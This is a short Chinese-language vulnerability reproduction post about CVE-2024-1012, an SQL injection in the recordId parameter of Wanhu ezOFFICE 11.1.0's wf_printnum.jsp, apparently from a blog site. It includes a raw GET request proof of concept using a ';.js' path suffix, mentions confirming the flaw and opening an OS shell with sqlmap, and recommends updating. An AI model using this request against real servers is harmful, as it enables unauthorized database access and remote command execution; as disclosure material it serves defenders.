简介
OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。
漏洞简介
Wanhu ezOFFICE 11.1.0中的一个严重漏洞被发现,该漏洞影响了文件defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp的某些未知处理过程。攻击者可以通过操纵参数recordId来进行SQL注入攻击。攻击可以远程启动。该漏洞已被公开披露,可能被利用。漏洞编号为CVE-2024-1012。
漏洞复现
访问defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1
出现下图则存在SQL注入。
poc
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
sqlmap验证
sqlmap开启OS shell
解决建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
